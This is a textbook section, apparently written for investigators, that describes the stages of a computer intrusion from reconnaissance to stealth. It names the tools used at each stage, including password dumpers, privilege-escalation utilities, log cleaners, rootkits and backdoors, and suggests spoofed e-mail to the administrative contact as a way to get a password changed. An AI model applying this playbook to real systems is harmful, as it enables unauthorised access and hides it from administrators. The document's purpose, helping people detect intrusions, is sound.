10.2 Intrusion MOs

10.2 Intrusion MOs

Before we detail how an intrusion detection systems work, it is important that a scenario be provided describing some of the common techniques, utilities, tools, and schemes used by hackers. There are several stages to an intentional system intrusion. There are half a dozen states, from the start of targeting a system to more daring probes, escalating to an all-out attack, to a system takeover and the setting of backdoors to enable the criminal to return. For those investigators who are not knowledgeable about some of these tools and utilities, it highly recommended that a search engine, such as Google.com, be used to research and even download them.

10.2.1 Intelligence

Any attack, just like a common burglary, starts with an intruder "casing the joint," or assessing the premises where the crime will take place, whether it is a bank or a server. The thief needs to know where the cameras and exits are to make a quick getaway without revealing his or her identity. This is the initial information-gathering process, and it can involve the use of open source search engines, Whois servers, USENet, Edgar, and domain name service lookups to obtain a composite of the target system.

MO

Edgar This is the Security and Exchange Commission (SEC) database at http://www.sec.gov, which provides a comprehensive view of publicly traded companies. Documents like 10Q and 10K provide a quick snapshot of a company's recent activities, especially with respect to new acquisitions, which may be the easiest path to a system penetration. Since the parent company will often scramble to bring new entities into its networks and Web site, with security often lagging behind, a hacker will note the new entities on file and target them first.

UseNet Mail postings by anybody associated with the company seeking technical assistance may signal a possible opening for an intrusion. This is readily available on the Internet to any hacker that knows what to look for.

Whois Whois servers can identify domain names and associated networks related to a particular firm or organization. These domain databases can be queried at http://www.networksolutions.com, http://www.arin.net, http://wwwallwhois.com or http://samspade.org. These databases can provide such intelligence, which a hacker can use prior to an intrusion attack as domain names, registration data, organization, point of contact and network IP address. The administrative contact is an important bit of intelligence, which a hacker can use to send spooffed e-mail, posing as the administrative contact, requesting a change of the password. Here is a sample of the information a Whois server provides:

    webminer.com    Request: webminer.com    Registrant:    WebMiner (WEBMINER-DOM)       2101 Shoreline Drive Suite 290       Alameda, CA 94501       US       Domain Name: WEBMINER.COM       Administrative Contact, Billing Contact:          Martines, Earl  (ECF327)  earl@LUMINAAMERICAS.COM          Webminer          760 Broadway 2nd Floor          New York, NY  10012          US          648.437-3331 646.437-3366       Technical Contact:          Hostmaster, Intermedia  (H02936-ORG)          hostmaster@INTERMEDIA.NET          Intermedia Corporation          953 Industrial Ave. Ste.121          Palo Alto, CA 94303          US          650-424-9935          Fax- - 650-424-9936          Fax- - - 650-424-9936       Record last updated on 10-May-2001.       Record expires on 01-May-2003.       Record created on 30-Apr-1997.       Database last updated on 18-Apr-2002 02:25:00 EDT.       Domain servers in listed order:       NS2.INTERMEDIA.NET          207.5.44.2       NS3.INTERMEDIA.NET          207.5.1.222 

Domain Name Service (DNS) After identifying associated domains, an attacker may begin to query the DNS, which is a distributed database used to map IP addresses to hostnames and vice versa, used mainly for redundancy of primary addresses with secondary ones. This service may be violated. If a DNS is configured insecurely, internal IP addresses may be disclosed to an attacker via the Internet, providing a complete map of a firm's internal network.

10.2.2 Scanning

At this phase an intruder will begin to use a different set of tools for the identification of listening services in search of the primary place for the break-in. This involves performing ping sweeps, port scans via the use of automated discovery tools. The objective of the perpetrator is to determine what ports are in a listening state and accessible via the Internet.

MO

fping Ping is a basic utility used to find out if a system is alive. It sends a packet to a target system; fping will send mass ping requests in parallel, sweeping multiple IP addresses. fping is a ping-like program, which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that the user can specify any number of hosts on the command line or specify a file containing the lists of hosts to ping. Instead of trying one host until it times out or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time or retry limit, it will be considered unreachable. Unlike ping, fping is used with scripts, and its output is easy to parse.

icmpenum This is yet another utility for sending packets to test if a system is alive. This tool allows packets dropped by border routers or firewalls using the ping utility. Host enumeration is the act of determining the IP address of potential targets on a network. Icmpenum uses not only ICMP echo packets to probe networks, but also ICMP timestamp and ICMP information packets as well. Furthermore, it supports spoofing and promiscuous listening for reply packets. Icmpenum is great for enumerating networks that block ICMP echo packets but have failed to block timestamp or information packets, or for upstream sniffing of trusted addresses. This is a proof-of-concept tool to demonstrate possible distributed attacking concepts, such as sending packets from one workstation and sniffing the reply packets on another.

Nmap Nmap is a port scanning tool used to determine the type of operating system a target computer is using, a key bit of intelligence for a preemptive attack. Other tools include NetScan, SuperScan, WinScan, ipEye, and WUPS. Nmap ("Network Mapper") is an open source utility for network exploration or security auditing. It was designed to scan large networks rapidly, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on a network, what services (ports) they are offering, what operating system version they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers, and both console and graphical versions are available. Nmap is free software, available with full source code. Counter port scanning tools include Snort, a freeware site-based system IDS and network-based IDSs, such as RealSecure.

10.2.3 Probing

At this phase, an attacker will attempt to identify user accounts, network resources, users and groups, file-sharing lists, and applications. These probes will differ depending on the operating system of the target computer: Windows NT/2000, Novell NetWare, Linux, and UNIX.

MO

DumpSEC This is a tool for discovering and listing a system network's user accounts. DumpSec is a security auditing program for Microsoft Windows NT^TM. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers, and shares in a concise, readable listbox format, so that holes in system security are readily apparent. DumpSec also dumps user, group, and replication information.

Sid2user This is another utility for revealing user accounts. It works with User2sid.exe, which can retrieve a SID from the Security Accounts Manager (SAM) from a local or a remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug, but call the functions LookupAccountName and LookupAccountSid, respectively. What is more, these utilities can be called against a remote machine without providing logon credentials, except those needed for a null session connection.

OnSite Admin This utility can list user accounts for Novell systems. Originally a multi-server analysis, maintenance, and configuration tool for NetWare servers, it allows the user to monitor, analyze, update, and configure multiple servers all from a single workstation.

10.2.4 Attack

This is the phase when an intruder has enough information about ports and users to mount an attempt to access a target system or network. Depending on the operating system, this may take different routes. Windows 95/98 and Millennium are the most susceptible to break-ins. Since they are end-user operating systems lacking the security of NT/2000 and other network OSs, they are the easiest to attack via the Internet or e-mail.

MO

tcpdump This is utility for eavesdropping for passwords. It is the most popular network sniffer and analyzer for UNIX systems.

NAT When invoked, will work for file share privileges via brute force.

pwdump2 This is another password file-grabbing utility. It dumps the password hashes (OWFs) from NT's SAM database.

It should be noted at this juncture that most IDS and data mining analyses concentrate on looking for these probes in the log files of systems for the detection of potential intrusion attempts and attacks.

10.2.5 Control

At this phase the perpetrator will seek full control of a target system. For example, when ports 135 or 139 show up on a scanning probe, the system is identified to be running NT and the following tools will be used to gain administrator privileges.

MO

LOphtrack This is a tool for password cracking. LOphtcrack can brute-force hashes taken from network logs or programs like pwdump and recover the plaintext password; it also breaks the new NT-style password hashes.

getadmin This is a program that adds a user to the Administrators group, thus allowing an intruder to become the Administrator of an NT machine and gain total control of the target system.

sechole This utility also adds a user to the Administrators group. The utility performs a very sophisticated set of steps that allows a nonadministrative user to gain debug-level access on a system process. Using this utility, the non-administrative user is able to run code in the system security context and, thereby, grant local administrative privileges on the NT system.

10.2.6 Stealth

In this final phase, total ownership of the target system is secured, and the attacker will likely begin to cover his or her tracks from the system administrators, setting trapdoors to secure privileged access, and enabling return.

MO

rhosts This utility will evaluate hosts and list hosts and users who are trusted by the local host.

zap This is a tool for clearing logs and removing the evidence of an intrusion.

rootkits This is a utility for hiding tools. Perpetrators will use it to hide and secure their presence in a system, modifying ls and ps programs not to display intruder activities: ls is altered not to display the intruder files, and ps is modified not to display their processes.

cron This is a tool for scheduling batch jobs. Cron is a background-only application which, quietly and efficiently, launches other applications or opens documents at specified dates and times.

netcat This is a utility for planting remote-control services. It reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable backend tool that can be used directly or easily driven by other programs. It is a feature-rich network debugging and exploration tool that can create almost any kind of connection a perpetrator needs.

VNC Is a program for remotely hijacking NT GUIs. VNC stands for virtual network computing. It is, in essence, a remote display system that allows the perpetrator to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of other machine architectures.

B02K This is Back Orifice 2000, an NT hacker tool for complete takeover of a Microsoft system.

As previously noted, cybercriminals can be classified as either external intruders who are unauthorized users of the machines they attack, or internal intruders who do not have permission to access certain portions of their host system. These internal intruders may also masquerade as another user, such as one with legitimate access to especially sensitive data. The most dangerous type is the clandestine intruder who has the power to turn off audit trails and take control of systems. System intrusions can also be viewed based on the following main categories:

1. Attempted break-ins or masqueraded attacks, which may be detected by atypical behavior profiles or violations of security constraints.

2. Penetration of the security control system, which may be detected by monitoring for specific patterns of activity.

3. Leakage or denial of service, which may be detected by atypical use of system resources.

4. Malicious use, which is detected by atypical behavior profiles, violations of security constraints, and the use of special privileges.